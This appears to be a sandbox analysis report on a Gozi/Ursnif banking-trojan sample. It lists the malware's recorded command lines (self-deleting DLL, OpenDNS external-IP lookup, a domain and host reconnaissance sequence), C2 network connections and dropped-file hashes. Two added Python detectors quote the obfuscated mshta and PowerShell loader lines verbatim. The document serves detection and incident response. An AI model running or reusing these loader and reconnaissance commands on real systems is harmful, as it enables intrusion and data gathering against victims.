C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp" "c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Program Files\Windows Mail\WinMail.exe

"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2039.bin1 > C:\Users\Admin\AppData\Local\Temp\2039.bin & del C:\Users\Admin\AppData\Local\Temp\2039.bin1"
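
The process list above is the whole Gozi/Ursnif loader chain in the clear: mshta runs an inline HTA that eval()s a script read back from the registry, PowerShell hides gp/iex behind throwaway aliases and pulls the next stage out of HKCU\Software\AppDataLow, cmd uses ping as a sleep before deleting the dropped DLL, nslookup against resolver1.opendns.com recovers the victim's external IP, and a fixed sequence of survey tools is appended to a %TEMP%\*.bin1 scratch file that is finally copied to its .bin name. The following detection script is an added example, not part of the sandbox report: its rules are written from the command lines listed above, the sample input is those command lines plus two constructed benign lines, and the three-tool threshold for calling a scratch file a survey chain is an assumption of the example.

```python
"""Command-line rules for the Gozi/Ursnif chain listed under Processes:
an mshta about:<hta:application> stub that eval()s a registry value, an
alias-obfuscated PowerShell stage reading HKCU\\Software\\AppDataLow, a
`ping localhost -n N && del` self-delete, the external-IP lookup through
OpenDNS, and the host survey appended to a %TEMP%\\*.bin1 scratch file.
"""
import re

# Each rule is matched against one raw process command line.
RULES = {
    # mshta launched with an inline HTA whose script eval()s a value read
    # back from the registry (the loader script is staged under HKCU).
    "mshta_registry_stub": re.compile(
        r"mshta\.exe.*about:<hta:application>.*\.regread\(", re.I),
    # PowerShell hides Get-ItemProperty/Invoke-Expression behind fresh
    # aliases and pulls the next stage out of HKCU\Software\AppDataLow.
    "powershell_alias_iex": re.compile(
        r"powershell\.exe.*new-alias\s+-name\s+\S+\s+-value\s+iex.*AppDataLow", re.I),
    # ping used as a sleep, then the dropped DLL is deleted.
    "ping_delay_self_delete": re.compile(
        r"\bping\s+localhost\s+-n\s+\d+\s*&&\s*del\b", re.I),
    # external IP discovery through OpenDNS.
    "external_ip_lookup": re.compile(
        r"nslookup\s+myip\.opendns\.com\s+resolver1\.opendns\.com", re.I),
    # survey scratch file copied to its final name, scratch removed.
    "survey_consolidate": re.compile(
        r'cmd\s+/U\s+/C\s+"type\s+\S+\.bin1\s*>\s*\S+\.bin\s*&\s*del\s+\S+\.bin1"', re.I),
}

# Survey tools seen in the chain, and the scratch file they redirect into.
SURVEY_TOOLS = re.compile(
    r"\b(systeminfo|tasklist|driverquery|nltest|net\s+view|net\s+config|"
    r"reg(?:\.exe)?\s+query|nslookup)\b", re.I)
REDIRECT_TARGET = re.compile(r">{1,2}\s*(\S+\.bin1)", re.I)


def classify(cmdline):
    """Names of the rules that fire on a single command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def survey_chains(cmdlines):
    """Map each .bin1 scratch file to the set of survey tools written into it."""
    chains = {}
    for line in cmdlines:
        target = REDIRECT_TARGET.search(line)
        tool = SURVEY_TOOLS.search(line)
        if target and tool:
            name = re.sub(r"\s+", " ", tool.group(1).lower().replace(".exe", ""))
            chains.setdefault(target.group(1), set()).add(name)
    return chains


def scan(cmdlines, min_survey_tools=3):
    """Rule hits plus every scratch file fed by at least min_survey_tools tools
    (the threshold is an assumption of this example)."""
    hits = {}
    for line in cmdlines:
        for name in classify(line):
            hits.setdefault(name, []).append(line)
    chains = {path: sorted(tools) for path, tools in survey_chains(cmdlines).items()
              if len(tools) >= min_survey_tools}
    return {"hits": hits, "survey_chains": chains}


# Constructed sample: command lines from the report plus two benign lines.
SAMPLE_CMDLINES = [
    r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Luo9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Luo9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"''',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vawdrha -value gp; new-alias -name yhwgucfiht -value iex; yhwgucfiht ([System.Text.Encoding]::ASCII.GetString((vawdrha "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))',
    r'"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"',
    r'ping localhost -n 5',
    r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"',
    r'nslookup myip.opendns.com resolver1.opendns.com',
    r'cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    r'cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2039.bin1 > C:\Users\Admin\AppData\Local\Temp\2039.bin & del C:\Users\Admin\AppData\Local\Temp\2039.bin1"',
    # benign lines (constructed) so the rules have something to ignore
    r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\Documents\notes.txt',
    r'ping 10.0.0.1 -n 1',
]

if __name__ == "__main__":
    result = scan(SAMPLE_CMDLINES)
    for name, lines in result["hits"].items():
        print(f"{name}: {len(lines)} hit(s)")
    for path, tools in result["survey_chains"].items():
        print(f"survey chain -> {path}: {', '.join(tools)}")
```

The survey grouping is the part worth keeping in a detection pipeline: each individual net, nltest or tasklist invocation is routine on an administrator's workstation, but eight different tools redirecting into the same freshly named %TEMP% file within a few seconds, followed by a `cmd /U /C "type ... & del ..."` consolidation, is not.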

Network

Country Destination Domain Proto
US 8.8.8.8:53 giporedtrip.at udp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
RU 45.9.20.190:80 45.9.20.190 tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
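
Read together, the rows above give the responder three things: repeated plaintext HTTP to giporedtrip.at (37.34.176.37), one HTTP connection straight to an IP literal (45.9.20.190), and DNS traffic to 208.67.222.222 that is the myip.opendns.com external-IP lookup from the process list, with the two in-addr.arpa queries being what the `nslookup 127.0.0.1` survey step generates. The script below is an added example that is not part of the sandbox report; it parses the table as printed above (copied in as constructed input) and the three-connection threshold for calling a peer a beacon is an assumption of the example.

```python
"""Triage of the Network table above: separate DNS lookups from TCP
connections and pull out what a responder would block or hunt for."""
from collections import Counter

# Constructed input: the report's Network table, copied verbatim.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 giporedtrip.at udp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
RU 45.9.20.190:80 45.9.20.190 tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
"""


def parse_rows(table):
    """Turn the four-column table into dicts; the header line is skipped."""
    rows = []
    for line in table.splitlines()[1:]:
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def is_ipv4(s):
    """True when the 'Domain' column is really an IP literal."""
    octets = s.split(".")
    return len(octets) == 4 and all(o.isdigit() and int(o) < 256 for o in octets)


def summarize(rows, min_connections=3):
    """Indicators from the parsed rows; min_connections is this example's
    (assumed) threshold for calling repeated connections a beacon."""
    tcp = [r for r in rows if r["proto"] == "tcp"]
    dns = [r for r in rows if r["proto"] == "udp" and r["port"] == 53]
    per_peer = Counter((r["domain"], r["ip"], r["port"]) for r in tcp)
    beacons = [
        {"domain": d, "ip": ip, "port": port, "connections": n}
        for (d, ip, port), n in per_peer.items()
        if n >= min_connections and not is_ipv4(d)
    ]
    return {
        # repeated connections to one named host: the C2 candidate
        "beacons": sorted(beacons, key=lambda b: -b["connections"]),
        # HTTP straight to an IP literal, no hostname involved
        "direct_ip_http": sorted({r["ip"] for r in tcp if is_ipv4(r["domain"])}),
        # resolvers the sample talked to; a non-default one is itself a signal
        "dns_resolvers": sorted({r["ip"] for r in dns}),
        "external_ip_lookup": any(r["domain"] == "resolver1.opendns.com" for r in dns),
        "all_tcp_plaintext_80": bool(tcp) and all(r["port"] == 80 for r in tcp),
        # PTR queries produced by the nslookup survey step
        "reverse_lookups": sorted(r["domain"] for r in dns
                                  if r["domain"].endswith(".in-addr.arpa")),
    }


if __name__ == "__main__":
    summary = summarize(parse_rows(NETWORK_TABLE))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

The `dns_resolvers` field is the cheap win here: an endpoint that normally resolves through the corporate resolver suddenly sending UDP/53 to 208.67.222.222 is a one-line network detection for this lookup, independent of the C2 domain, which changes from campaign to campaign.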

Files

memory/3140-115-0x00000000049C0000-0x00000000049D0000-memory.dmp

memory/3140-116-0x0000000074160000-0x000000007417C000-memory.dmp

memory/3008-126-0x0000014DF37B0000-0x0000014DF37D2000-memory.dmp

memory/3008-131-0x0000014DF3800000-0x0000014DF3802000-memory.dmp

memory/3008-132-0x0000014DF3803000-0x0000014DF3805000-memory.dmp

memory/3008-133-0x0000014DF43E0000-0x0000014DF4456000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline

MD5 1a0c92d1003713e7c07ccefddaa34a87
SHA1 aed034fcabf21b2df3f8a47b5c4d0432d8418f09
SHA256 8653b4a590fac56f3829025ddefc0b6c8dc911349067491a1aaa6a6e4df457d4
SHA512 4b519b7c8141f6d5c56f5ffd4294eefeb6df9e9a9223a2bfbee7f7dd05e02d7d3295dff454575fc674b8ebcff26d1b58fb8e95d931fee5617c1a550793f5007a

\??\c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.0.cs

MD5 04ca9f3dd2f71bc69a66232592bd29b7
SHA1 12724cb97fe30a8b84901648b3653b9ac8fb2f73
SHA256 dbc22ffc06ebcb8f7e00bb962ca175effbbdf0debe7a2e4d288a8735c5c27db1
SHA512 383c82a91a354a95e9887e9731852788f466c461ea58a016532e4b07a3e19a97c525b4b579b86a4681bf3dbacfa6b65c8f11032b904737c287a6a5498e4eeb4e

\??\c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP

MD5 024173a35744c972050c9ba2a0815be6
SHA1 315835e18f177968d2f2a08defe26e7b14c13093
SHA256 98305a08e9d286a932f76a8a362599d4f32373c7bd6f64b58a0ec2528581b4d4
SHA512 b2f8291ec998ba154646e576e7e3b4caa1eeda1a231d2e1982142859dc0ccdcd547667495e9e5b118dc81639565e92ba96327e25297cac77d4948e2cdf435539

C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp

MD5 1c66b543d4caa2e3c99a31c1d5b1bc2c
SHA1 afe51f9d060ea5146b2c86fb08b9f767cfe74b07
SHA256 6c36759fa55c97401017d1259f4627c2a4d9053416ce030850df96343b7587c0
SHA512 168e689de2e9031b091cd46f745a4b2c9832b7510e5b769d6056fbd4215b2f608325113002a98638516a59def47205a5889e0a6c6c5b04edd3ab1dceb6ad9f50

C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.dll

MD5 9655b240cd65d1243adf32765b08abc4
SHA1 b4674c9ec668a160bb5268d227ce2e7c74cba6e3
SHA256 f5f2a51576eab45c9956abe455a5a3cd2329751590a80f19be5add82542d4a24
SHA512 378152bb7439b1a5287ab0973ac2ccf27ead42ae84c5a669de116cd7e5c31392348c377c866488e760194aed4bf75b94f84b63b01f4c4d9b6f7bdb5565d34c35

memory/3008-151-0x0000014DF4360000-0x0000014DF4368000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline

MD5 d6ce24617d26fcd7a1571d7aee1ba31d
SHA1 6fc9880d76b1045128e4019ea7b4f87009a7c570
SHA256 c2cabf9e22d585e300b5b56141009eb0602bb448801cfcbc64499242e94b0914
SHA512 c3668d71b8df0137298f19d6557c11042b4cd6a093b9fc4f224d359b60266e97219f3e7ab99e6cf2b4e7200b7dd1063a553e68e959d1f564d5b2d65d13712065

\??\c:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.0.cs

MD5 35eab9a45b1cc09a0099a179ad3dcfe5
SHA1 42939ac7047bc372300fdd21624100e5c9f83b7f
SHA256 eeeecb79a83f234a098d4e685f9649e562ee2c5180da03ce782df3f95d7eb5a7
SHA512 03db096cd43e298a526507be3252f718516e26ecb50400d052b9c26e76eb89f950770696f2034fd9031e3421ee5f7e225d985bfd92cc51338ec19854c85017c1

\??\c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP

MD5 bb6c7f2e3be6251fd865caff4682e016
SHA1 5dbeebaaa26be09cc921d1d00710303df5335dad
SHA256 49ca679fc02c6b958fe06ea3a784a130e6c9be537efbcbe1b8517862308238e7
SHA512 2d53f44c4dabfd9f50678a7515dca17b793848969d327543e649db93239b86da3ee815a81de0d69cf6cd49167fd482ae7847b03a33bb11f1734322424955e38e

C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp

MD5 0b0cfa879eb29ed2849fd4f7daed161d
SHA1 d283f210cb71e4910d73cffd359d5beea120fee6
SHA256 99f06e5bf4abde4ee791b8cdbddb6d7d9fd4f95f99b283999bf23d12dc595c4d
SHA512 e63bf11d15c342b93a34533597588dac08e5a1493e0a93415e538c8b969fdc46dfc548d8050e7c12e57972203077d2473e0e2c767af9f62f24df2f2f0d171cdf

C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.dll

MD5 2744b5da7811f14c798f67991dcbab48
SHA1 c445081cecb4b261cf1b3174a12b6381165ed16a
SHA256 5f1612f1cdfd76d364ecec760ad2d32f08646e2008492a7335e973a705365595
SHA512 8c0f3f4ec686cc4b067c3af9c1d20645fbdcd7ce5daa967573fc709134880c819a09912b05b004b33708196ed31fb0bbab936781dc24e03187db98d455f5816b

memory/3008-157-0x0000014DF4380000-0x0000014DF4388000-memory.dmp

memory/3008-162-0x0000014DF4390000-0x0000014DF43D4000-memory.dmp

memory/2304-173-0x00000183CC8E0000-0x00000183CC8E1000-memory.dmp

memory/2304-174-0x00000183CCB20000-0x00000183CCBD8000-memory.dmp

memory/3020-175-0x0000000000800000-0x0000000000801000-memory.dmp

memory/3020-176-0x0000000000A00000-0x0000000000AB8000-memory.dmp

memory/3492-177-0x000001B160720000-0x000001B160721000-memory.dmp

memory/3492-178-0x000001B1622A0000-0x000001B162358000-memory.dmp

memory/1928-179-0x000002A49D2C0000-0x000002A49D2C1000-memory.dmp

memory/1928-180-0x000002A49D460000-0x000002A49D518000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B9E4.bi1

MD5 82f12896705faeb1630b62f16d5f5cc8
SHA1 9ed376a84dd777c28d4510cd747da4fbbc2ff63b
SHA256 caccfc569992c55c1e532dd816a6e1846281397127c61e3403294d527780a35e
SHA512 e1f04928aea8e710cd34fd6a0580ad9fe2f045485574b1ba4e4e7db376cffd9dacbc15e51f54cb247a85985739b0d70b9e783c1e573ceb8785fc0662be35c379

C:\Users\Admin\AppData\Local\Temp\B9E4.bi1

MD5 41a49d1a2a3a8713a12ccf89932d4bb7
SHA1 b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287
SHA256 f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe
SHA512 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1

memory/1576-185-0x00000203DDAB0000-0x00000203DDB68000-memory.dmp

memory/3204-190-0x0000000000EA6CD0-0x0000000000EA6CD4-memory.dmp

memory/3204-201-0x00000000007E0000-0x000000000088A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 ecb7525f4380cade12b09d9c325f4187
SHA1 f08ac2cde62dea441f84a457552d77a1e0b38ded
SHA256 3dda972a01e6fd6eeae8eac8053541e31e013f785fe03b937654c77decbf2655
SHA512 5ea4f30a9368af1c54c5819333ad156a6aedde09026530b44ca14496ac8ee8069dbcd6ea52db1d6b8fa17ff1fbf7c40891b905aeb60a7fcd06a65545a80a26ac

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 68fcecb9d39760569d7917876931c941
SHA1 bc440592668432906944912055bbf192fb437c9b
SHA256 c87180547e984f93dd9e0d904a768019bfb08b10a5639fc60590cdb48b5627f0
SHA512 3f4ad432802ce2507f57f7d6f64b494ddca96a9d59eafab9d7a39dd26579cea5341061a6929ce3e646672729ba00346c73c71dbc3d46eaeaec53a90d39f5e647

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 5f779c787614c0e2ab1709022d4422b5
SHA1 20182276c54c92a01cb608f582da535845d369bd
SHA256 567c91e83b91232c0f22279c7f5c975d64d12b195a5017727b5e6e4d1c8d8622
SHA512 c969ba943402d58adfe896815d223d31c7a62aeb25a82f4d21b8f25146ffc36c38d197d05e7e3e848d7a682bca788e8d619ed7b8860485aabe9b51a6a1228cc7

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 000891e99835670955ee57eb8f2f3ccf
SHA1 d40698655f27a057194112c6799222fec073819f
SHA256 12ec2e82ae901201ff35d56840038171bfb87187af6eb856c7aa5b3d32fd61a4
SHA512 8e36e8ba66d120c9af59da18e815d4755926d706019786da106d4de481a85be29374f65d18d30e7b3916d7a5f2e3700780024cff77bb4f3f47a6aca0996ec84d

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 dc80049c2487894cfbe07fe0bd6dce3c
SHA1 b1073f1d62c59d8b7eb55f6b9bf27cddf5afef1b
SHA256 f1d05989ee98018b1f424dbcbc4e3f04f1df5d67c059e8da9b072e5fb4e8e5ed
SHA512 78cc674ab2644f8b25c1da9244f54c91b625f6831b49c49731b0d96f744190c8765b67b0736c26eee5c010d52925db0edc0f52b70760835a3e1653351adc530c

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 2111485e2463ae8e43ac97eced0ebb96
SHA1 41b545d143687428ff035f76aec73c74bb8426ca
SHA256 cc4b6e5d7c0fa71f7479ed2f42ffb9d9d357bae51c994cc647c80e3cc41d1b9b
SHA512 a3b12b4edd5debc8464817d4e0f31f6c6b5845bcc5b5773a466697bae22a1f832d96954699187593042c7e18e59eb507cf7b7019783f6c5125c7ec6626a9caef

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 9cacce34b1a599165a8a33e6ce535b37
SHA1 45cd46e949a3a068fafb153836760745339a1806
SHA256 e1448e5434c66bf473b1307857b0857111214e4fde628d073bc03941bbd3cb20
SHA512 0c8d8b6ac25a135a3a9fbafa5494ec1f3477760f7dde3bfaac6452f9616782d18c945265881eaea3ac3b14e35e37938bc2b4469428016936bafebcbf481ffc66

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 511d114b9b820096c4db4f856a6436e2
SHA1 92106cd5a499a807088d3b2037b71b78dd66e228
SHA256 2e6d461d9583c47f3389d62d9f99279c146f65b528bb253327acf6e6c6baeb8b
SHA512 c563d796b6b43408413144f93b8d985c6c758eab242b68686b3835041c2e45349773eba207dd5a924eb35d2772dfbdaad9f06fc8c545502a4d0f7eb4239e8539

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 463674fb18fc5df74bc393bd057be376
SHA1 1b2a09dba14b007e5fa3a0fd06c2f4b01d57aa17
SHA256 f681b9914feef6512ce2624a7cd695facc71aa8b526b41bd4a4fd504b81ea1c1
SHA512 09e6bc98317ed5854767dda74f237293df2ddca7db3e509991c671fccfe7c990effae1f3ed37ac5ebe37f74c4b379c8f91971208329a29581532335415d63729

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 d5bf46671e9da549104fd8cb5d60a94a
SHA1 513ec3c2817bfd83549fdca86e61a02f6da6023b
SHA256 8516468a3ed19d55123abc53bfc6eab152f41b0b6a67d13fbe5b6eb4820d40f9
SHA512 58edb1d6186ea5785ce398c6a474218aa5070e76bbf36e978330bfa7f2f7b54800beb3904bbc37aead64922face3efd41db210c29214eaa01622f527ac30cfd9

C:\Users\Admin\AppData\Local\Temp\2039.bin1

MD5 8ca6257803d36829e3502fe894b3ec8f
SHA1 e06925abd9cc534fb3fd6cd50d390f9924a42cb8
SHA256 d4ce5b363f863991b2b611a8910f7d757edd0794e0c5239c95ca0859390e57cc
SHA512 684e4b6c6254b12adec904f4b523548f5d4076872be1939fc61901e500adfb266fa39def0268592b51e460ce7154a8ce5ea3c60f4578ead58e053ed9069023d6

C:\Users\Admin\AppData\Local\Temp\2039.bin

MD5 8ca6257803d36829e3502fe894b3ec8f
SHA1 e06925abd9cc534fb3fd6cd50d390f9924a42cb8
SHA256 d4ce5b363f863991b2b611a8910f7d757edd0794e0c5239c95ca0859390e57cc
SHA512 684e4b6c6254b12adec904f4b523548f5d4076872be1939fc61901e500adfb266fa39def0268592b51e460ce7154a8ce5ea3c60f4578ead58e053ed9069023d6